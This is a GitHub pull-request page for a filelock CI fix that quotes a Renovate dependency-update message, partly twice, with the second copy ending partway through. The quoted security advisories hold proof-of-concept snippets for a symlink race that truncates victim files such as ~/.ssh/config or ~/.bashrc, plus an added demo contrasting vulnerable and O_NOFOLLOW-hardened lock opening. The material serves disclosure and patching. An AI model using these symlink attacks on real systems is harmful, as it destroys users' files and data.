🐛 fix(ci): unbreak release workflow, publish to PyPI again #529

Merged
Commit 8cd6bd9 moved the release version from a GitHub Actions template expression into a bash env var as a zizmor-suggested hardening against template injection. The move was correct but kept the existing single quotes around the reference, which in bash suppress variable expansion. Every release since 3.26.0 therefore created a git tag literally named `${STEPS_V_OUTPUTS_VERSION}`, hatch-vcs could not find a matching version on HEAD, and uv build produced a `.devN+g<sha>` local identifier that PyPI rejected with a 400. GitHub tags were still pushed by an earlier step so the breakage only surfaced in the PyPI publish log, not in the build job that CI runs on every push. Double quotes preserve the env-var indirection zizmor wanted while letting bash actually read the value. The next workflow_dispatch picks up the correct tag and hatch-vcs stamps the clean version onto the wheel.

The actions/upload-artifact hash pinned in check.yaml and release.yaml resolves to the commit tagged v7.0.0, but the inline version comment next to it only said `# v7`. Zizmor's ref-version-mismatch audit flags that as an unverifiable pin because the moving major tag points to a different commit than the one actually in use. Pre-commit surfaced the warning on the release-quoting fix and blocked this branch from passing CI. Updating the comment to the exact tag the hash resolves to preserves the existing pinned hash (no behavioral change) while giving reviewers and the audit a precise, verifiable label.
renovate-coop-norge Bot added a commit to coopnorge/engineering-docker-images that referenced this pull request on Apr 15, 2026:
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.25.2` → `3.28.0` |  |  |

---

### filelock has a TOCTOU race condition which allows symlink attacks during lock file creation

[CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) / [GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f)

<details>
<summary>More information</summary>

#### Details

##### Impact

A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file.

**Who is impacted:** All users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries:

- **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths
- **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures
- **poetry/tox users**: through using virtualenv or filelock on their own.

Attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable.

##### Patches

Fixed in version **3.20.1**.

**Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\_acquire() to prevent symlink following.

**Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\_acquire().

**Users should upgrade to filelock 3.20.1 or later immediately.**

##### Workarounds

If immediate upgrade is not possible:

1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases)
2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks
3. Monitor lock file directories for suspicious symlinks before running trusted applications

**Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended.

---

##### Technical Details: How the Exploit Works

##### The Vulnerable Code Pattern

**Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`):

```python
def _acquire(self) -> None:
    ensure_directory_exists(self.lock_file)
    open_flags = os.O_RDWR | os.O_TRUNC            # (1) Prepare to truncate
    if not Path(self.lock_file).exists():          # (2) CHECK: Does file exist?
        open_flags |= os.O_CREAT
    fd = os.open(self.lock_file, open_flags, ...)  # (3) USE: Open and truncate
```

**Windows** (`src/filelock/_windows.py:19-28`):

```python
def _acquire(self) -> None:
    raise_on_not_writable_file(self.lock_file)   # (1) Check writability
    ensure_directory_exists(self.lock_file)
    flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC  # (2) Prepare to truncate
    fd = os.open(self.lock_file, flags, ...)     # (3) Open and truncate
```

##### The Race Window

The vulnerability exists in the gap between operations:

**Unix variant:**

```
Time  Victim Thread                        Attacker Thread
----  -------------                        ---------------
T0    Check: lock_file exists? → False
T1    ↓ RACE WINDOW
T2                                         Create symlink: lock → victim_file
T3    Open lock_file with O_TRUNC
      → Follows symlink
      → Opens victim_file
      → Truncates victim_file to 0 bytes! ☠️
```

**Windows variant:**

```
Time  Victim Thread                        Attacker Thread
----  -------------                        ---------------
T0    Check: lock_file writable?
T1    ↓ RACE WINDOW
T2                                         Create symlink: lock → victim_file
T3    Open lock_file with O_TRUNC
      → Follows symlink/junction
      → Opens victim_file
      → Truncates victim_file to 0 bytes! ☠️
```

##### Step-by-Step Attack Flow

**1. Attacker Setup:**

```python
# Attacker identifies target application using filelock
lock_path = "/tmp/myapp.lock"             # Predictable lock path
victim_file = "/home/victim/.ssh/config"  # High-value target
```

**2. Attacker Creates Race Condition:**

```python
import os
import threading


def attacker_thread():
    # Remove any existing lock file
    try:
        os.unlink(lock_path)
    except FileNotFoundError:
        pass
    # Create symlink pointing to victim file
    os.symlink(victim_file, lock_path)
    print(f"[Attacker] Created: {lock_path} → {victim_file}")


# Launch attack
threading.Thread(target=attacker_thread).start()
```

**3. Victim Application Runs:**

```python
from filelock import UnixFileLock

# Normal application code
lock = UnixFileLock("/tmp/myapp.lock")
lock.acquire()  # ← VULNERABILITY TRIGGERED HERE
# At this point, /home/victim/.ssh/config is now 0 bytes!
```

**4. What Happens Inside os.open():**

On Unix systems, when `os.open()` is called:

```c
// Linux kernel behavior (simplified)
int open(const char *pathname, int flags) {
    struct file *f = path_lookup(pathname);  // Resolves symlinks by default!
    if (flags & O_TRUNC) {
        truncate_file(f);  // ← Truncates the TARGET of the symlink
    }
    return file_descriptor;
}
```

Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file.

##### Why the Attack Succeeds Reliably

**Timing Characteristics:**

- **Check operation** (Path.exists()): ~100-500 nanoseconds
- **Symlink creation** (os.symlink()): ~1-10 microseconds
- **Race window**: ~1-5 microseconds (very small but exploitable)
- **Thread scheduling quantum**: ~1-10 milliseconds

**Success factors:**

1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts
2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations
3. **No synchronization**: No atomic file creation prevents the race
4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only operation)

##### Real-World Attack Scenarios

**Scenario 1: virtualenv Exploitation**

```python
import os

# Victim runs: python -m venv /tmp/myenv
# Attacker racing to create:
os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg")
# Result: /home/victim/.bashrc overwritten with:
#   home = /usr/bin/python3
#   include-system-site-packages = false
#   version = 3.11.2
# ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker
```

**Scenario 2: PyTorch Cache Poisoning**

```python
import os

# Victim runs: import torch
# PyTorch checks CPU capabilities, uses filelock on cache
# Attacker racing to create:
os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock")
# Result: Trained ML model checkpoint truncated to 0 bytes
# Impact: Weeks of training lost, ML pipeline DoS
```

##### Why Standard Defenses Don't Help

**File permissions don't prevent this:**

- Attacker doesn't need write access to victim_file
- os.open() with O_TRUNC follows symlinks using the *victim's* permissions
- The victim process truncates its own file

**Directory permissions help but aren't always feasible:**

- Lock files often created in shared /tmp directory (mode 1777)
- Applications may not control lock file location
- Many apps use predictable paths in user-writable directories

**File locking doesn't prevent this:**

- The truncation happens *during* the open() call, before any lock is acquired
- fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks

##### Exploitation Proof-of-Concept Results

From empirical testing with the provided PoCs:

**Simple Direct Attack** (`filelock_simple_poc.py`):

- Success rate: 33% per attempt (1 in 3 tries)
- Average attempts to success: 2.1
- Target file reduced to 0 bytes in <100ms

**virtualenv Attack** (`weaponized_virtualenv.py`):

- Success rate: ~90% on first attempt (deterministic timing)
- Information leaked: File paths, Python version, system configuration
- Data corruption: Complete loss of original file contents

**PyTorch Attack** (`weaponized_pytorch.py`):

- Success rate: 25-40% per attempt
- Impact: Application crashes, model loading failures
- Recovery: Requires cache rebuild or model retraining

**Discovered and reported by:** George Tsigourakos (@tsigouris007)

#### Severity

- CVSS Score: 6.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H`

#### References

- [https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f)
- [https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e)
- [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock)
- [https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1)
- [https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants)
- [https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html)

This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-w853-jp5j-5j7f) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).

</details>

---

### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock

[CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) / [GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw)

<details>
<summary>More information</summary>

#### Details

##### Vulnerability Summary

- **Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock
- **Affected Component:** `filelock` package - `SoftFileLock` class
- **File:** `src/filelock/_soft.py` lines 17-27
- **CWE:** CWE-362, CWE-367, CWE-59

---

##### Description

A TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly.

The vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service.

##### Attack Scenario

```
1. Lock attempts to acquire on /tmp/app.lock
2. Permission validation passes
3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock
4. os.open() tries to create lock file
5. Lock operates on attacker-controlled target file or fails
```

---

##### Impact

_What kind of vulnerability is it? Who is impacted?_

This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization.

**Affected Users:**

- Applications using `filelock.SoftFileLock` directly
- Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy)

**Consequences:**

- **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed
- **Denial of Service** - attacker can prevent lock file creation by maintaining symlink
- **Resource serialization failures** - multiple processes may acquire "locks" simultaneously
- **Unintended file operations** - lock could operate on attacker-controlled files

**CVSS v4.0 Score:** 5.6 (Medium)

**Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N

**Attack Requirements:**

- Local filesystem access to the directory containing lock files
- Permission to create symlinks (standard for regular unprivileged users on Unix/Linux)
- Ability to time the symlink creation during the narrow race window

---

##### Patches

_Has the problem been patched? What versions should users upgrade to?_

Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation.

**Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0)

**Mitigation Details:**

- The `O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support
- On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented
- On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented

**Users should:**

- Upgrade to the patched version when available
- For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock`

---

##### Workarounds

_Is there a way for users to fix or remediate the vulnerability without upgrading?_

For users unable to update immediately:

1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146)
2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories:
   ```bash
   chmod 700 /path/to/lock/directory
   ```
3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation
4. **Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations

---

##### References

_Are there any links users can visit to find out more?_

- **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock)
- **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html
- **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html
- **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html
- **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html
- **GitHub Repository:** https://github.com/tox-dev/filelock

---

**Reported by:** George Tsigourakos (@tsigouris007)

#### Severity

- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H`

#### References

- [https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw)
- [https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701)
- [https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0)
- [https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5)
- [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock)

This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-qmgc-5h2g-mvrw) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).

</details>

---

### Release Notes

<details>
<summary>tox-dev/py-filelock (filelock)</summary>

### [`v3.28.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.28.0)

[Compare Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.25.2...3.28.0)

#### What's Changed

- 🐛 fix(ci): unbreak release workflow, publish to PyPI again by [@gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#529](https://redirect.github.com/tox-dev/filelock/pull/529)

**Full Changelog**: <tox-dev/filelock@3.27.0...3.28.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

- [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Renovate Bot](https://redirect.github.com/renovatebot/renovate).

Co-authored-by: renovate-coop-norge[bot] <151545514+renovate-coop-norge[bot]@users.noreply.github.com>
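Both advisories in the Renovate body above come down to the same primitive: a lock path that is checked, then opened with O_TRUNC, while an attacker swaps a symlink in between. The block below is an added example, not filelock's own code and not the reporter's PoCs: it puts the pre-3.20.1 check-then-open shape (the CVE-2025-68146 pattern) beside an `O_NOFOLLOW` open with the lstat fallback the CVE-2026-22701 patch description calls degraded mode, and runs each against a symlink planted in a throwaway directory. The function names, the 0o644 mode and the sample file contents are assumptions of this example; planting the symlink before the open stands in for the attacker winning the race, since the effect on the target file is the same either way.

```python
"""Added example, not filelock's own code: check-then-open with O_TRUNC
beside an O_NOFOLLOW open, each run against a planted symlink.

Assumes a POSIX filesystem where an unprivileged user may create symlinks.
The symlink is planted before the victim opens; that stands in for winning
the race window described in the advisories.
"""
from __future__ import annotations

import errno
import os
import tempfile
from pathlib import Path

# Constructed sample content standing in for the file the attacker targets.
VICTIM_CONTENT = b"constructed sample: lines the victim does not want truncated\n"


def vulnerable_acquire(lock_file: str) -> int:
    """Pre-3.20.1 UnixFileLock shape: exists() check, then open with O_TRUNC.

    Path.exists() follows the symlink (the target exists, so O_CREAT is not
    added) and os.open() follows it again, so O_TRUNC lands on the target.
    """
    open_flags = os.O_RDWR | os.O_TRUNC
    if not Path(lock_file).exists():
        open_flags |= os.O_CREAT
    return os.open(lock_file, open_flags, 0o644)  # mode is an assumption here


def hardened_acquire(lock_file: str) -> int:
    """Open with O_NOFOLLOW so a symlink at lock_file is refused (ELOOP).

    Where the platform has no O_NOFOLLOW, fall back to an lstat()-based
    islink() check. That keeps a (smaller) TOCTOU window between the check
    and the open, which is the degraded mode the SoftFileLock advisory notes.
    """
    open_flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC
    nofollow = getattr(os, "O_NOFOLLOW", 0)
    if nofollow:
        open_flags |= nofollow
    elif os.path.islink(lock_file):
        raise OSError(errno.ELOOP, "refusing to open a symlinked lock path", lock_file)
    return os.open(lock_file, open_flags, 0o644)


def run_against_planted_symlink(acquire) -> tuple[int, bool]:
    """Plant victim file and a lock -> victim symlink, then call acquire(lock).

    Returns (victim file size afterwards, whether acquire refused with OSError).
    """
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "victim.txt")
        lock = os.path.join(tmp, "app.lock")
        with open(victim, "wb") as f:
            f.write(VICTIM_CONTENT)
        os.symlink(victim, lock)  # the attacker's move: lock path points at the victim
        refused = False
        try:
            os.close(acquire(lock))
        except OSError:
            refused = True
        return os.path.getsize(victim), refused


if __name__ == "__main__":
    for name, fn in (("vulnerable", vulnerable_acquire), ("hardened", hardened_acquire)):
        size, refused = run_against_planted_symlink(fn)
        print(f"{name:10s} victim size after open: {size:3d}  refused: {refused}")
```

On Linux and macOS the hardened open fails with ELOOP and the victim file keeps its contents; the vulnerable open succeeds and leaves the victim at 0 bytes. The fallback branch only narrows the window, it does not close it, which is why the advisory still recommends `UnixFileLock` or `WindowsFileLock` over `SoftFileLock` where `O_NOFOLLOW` is unavailable; Windows needs the reparse-point check the first advisory describes rather than this flag.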
renovate-coop-norge Bot
added a commit
to coopnorge/engineering-docker-images
that referenced
this pull request
Apr 15, 2026
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.25.2` → `3.28.0` |  |  | --- ### filelock has a TOCTOU race condition which allows symlink attacks during lock file creation [CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) / [GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f) <details> <summary>More information</summary> #### Details ##### Impact A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. **Who is impacted:** All users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries: - **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths - **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures - **poetry/tox users**: through using virtualenv or filelock on their own. Attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable. ##### Patches Fixed in version **3.20.1**. **Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\_acquire() to prevent symlink following. 
**Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\_acquire(). **Users should upgrade to filelock 3.20.1 or later immediately.** ##### Workarounds If immediate upgrade is not possible: 1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases) 2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks 3. Monitor lock file directories for suspicious symlinks before running trusted applications **Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended. ______________________________________________________________________ ##### Technical Details: How the Exploit Works ##### The Vulnerable Code Pattern **Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`): ```python def _acquire(self) -> None: ensure_directory_exists(self.lock_file) open_flags = os.O_RDWR | os.O_TRUNC # (1) Prepare to truncate if not Path(self.lock_file).exists(): # (2) CHECK: Does file exist? open_flags |= os.O_CREAT fd = os.open(self.lock_file, open_flags, ...) # (3) USE: Open and truncate ``` **Windows** (`src/filelock/_windows.py:19-28`): ```python def _acquire(self) -> None: raise_on_not_writable_file(self.lock_file) # (1) Check writability ensure_directory_exists(self.lock_file) flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC # (2) Prepare to truncate fd = os.open(self.lock_file, flags, ...) # (3) Open and truncate ``` ##### The Race Window The vulnerability exists in the gap between operations: **Unix variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file exists? → False T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink → Opens victim_file → Truncates victim_file to 0 bytes! 
☠️ ``` **Windows variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file writable? T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink/junction → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` ##### Step-by-Step Attack Flow **1. Attacker Setup:** ```python ##### Attacker identifies target application using filelock lock_path = "/tmp/myapp.lock" # Predictable lock path victim_file = "/home/victim/.ssh/config" # High-value target ``` **2. Attacker Creates Race Condition:** ```python import os import threading def attacker_thread(): # Remove any existing lock file try: os.unlink(lock_path) except FileNotFoundError: pass # Create symlink pointing to victim file os.symlink(victim_file, lock_path) print(f"[Attacker] Created: {lock_path} → {victim_file}") ##### Launch attack threading.Thread(target=attacker_thread).start() ``` **3. Victim Application Runs:** ```python from filelock import UnixFileLock ##### Normal application code lock = UnixFileLock("/tmp/myapp.lock") lock.acquire() # ← VULNERABILITY TRIGGERED HERE ##### At this point, /home/victim/.ssh/config is now 0 bytes! ``` **4. What Happens Inside os.open():** On Unix systems, when `os.open()` is called: ```c // Linux kernel behavior (simplified) int open(const char *pathname, int flags) { struct file *f = path_lookup(pathname); // Resolves symlinks by default! if (flags & O_TRUNC) { truncate_file(f); // ← Truncates the TARGET of the symlink } return file_descriptor; } ``` Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file. ##### Why the Attack Succeeds Reliably **Timing Characteristics:** - **Check operation** (Path.exists()): ~100-500 nanoseconds - **Symlink creation** (os.symlink()): ~1-10 microseconds - **Race window**: ~1-5 microseconds (very small but exploitable) - **Thread scheduling quantum**: ~1-10 milliseconds **Success factors:** 1. 
**Tight loop**: Running attack in a loop hits the race window within 1-3 attempts 2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations 3. **No synchronization**: No atomic file creation prevents the race 4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only operation) ##### Real-World Attack Scenarios **Scenario 1: virtualenv Exploitation** ```python ##### Victim runs: python -m venv /tmp/myenv ##### Attacker racing to create: os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg") ##### Result: /home/victim/.bashrc overwritten with: ##### home = /usr/bin/python3 ##### include-system-site-packages = false ##### version = 3.11.2 ##### ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker ``` **Scenario 2: PyTorch Cache Poisoning** ```python ##### Victim runs: import torch ##### PyTorch checks CPU capabilities, uses filelock on cache ##### Attacker racing to create: os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock") ##### Result: Trained ML model checkpoint truncated to 0 bytes ##### Impact: Weeks of training lost, ML pipeline DoS ``` ##### Why Standard Defenses Don't Help **File permissions don't prevent this:** - Attacker doesn't need write access to victim_file - os.open() with O_TRUNC follows symlinks using the *victim's* permissions - The victim process truncates its own file **Directory permissions help but aren't always feasible:** - Lock files often created in shared /tmp directory (mode 1777) - Applications may not control lock file location - Many apps use predictable paths in user-writable directories **File locking doesn't prevent this:** - The truncation happens *during* the open() call, before any lock is acquired - fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks ##### Exploitation Proof-of-Concept Results From empirical testing with the provided PoCs: **Simple Direct Attack** 
(`filelock_simple_poc.py`): - Success rate: 33% per attempt (1 in 3 tries) - Average attempts to success: 2.1 - Target file reduced to 0 bytes in \<100ms **virtualenv Attack** (`weaponized_virtualenv.py`): - Success rate: ~90% on first attempt (deterministic timing) - Information leaked: File paths, Python version, system configuration - Data corruption: Complete loss of original file contents **PyTorch Attack** (`weaponized_pytorch.py`): - Success rate: 25-40% per attempt - Impact: Application crashes, model loading failures - Recovery: Requires cache rebuild or model retraining **Discovered and reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 6.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f) - [https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) - [https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1) - [https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants) - [https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-w853-jp5j-5j7f) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). 
</details>

---

### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock

[CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) / [GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw)

<details>
<summary>More information</summary>

#### Details

##### Vulnerability Summary

**Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock

**Affected Component:** `filelock` package - `SoftFileLock` class

**File:** `src/filelock/_soft.py` lines 17-27

**CWE:** CWE-362, CWE-367, CWE-59

---

##### Description

A TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly.

The vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service.

##### Attack Scenario

```
1. Lock attempts to acquire on /tmp/app.lock
2. Permission validation passes
3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock
4. os.open() tries to create lock file
5. Lock operates on attacker-controlled target file or fails
```

---

##### Impact

_What kind of vulnerability is it? Who is impacted?_

This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization.

**Affected Users:**

- Applications using `filelock.SoftFileLock` directly
- Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy)

**Consequences:**

- **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed
- **Denial of Service** - attacker can prevent lock file creation by maintaining symlink
- **Resource serialization failures** - multiple processes may acquire "locks" simultaneously
- **Unintended file operations** - lock could operate on attacker-controlled files

**CVSS v4.0 Score:** 5.6 (Medium)

**Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N

**Attack Requirements:**

- Local filesystem access to the directory containing lock files
- Permission to create symlinks (standard for regular unprivileged users on Unix/Linux)
- Ability to time the symlink creation during the narrow race window

---

##### Patches

_Has the problem been patched? What versions should users upgrade to?_

Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation.

**Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0)

**Mitigation Details:**

- The `O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support
- On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented
- On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented

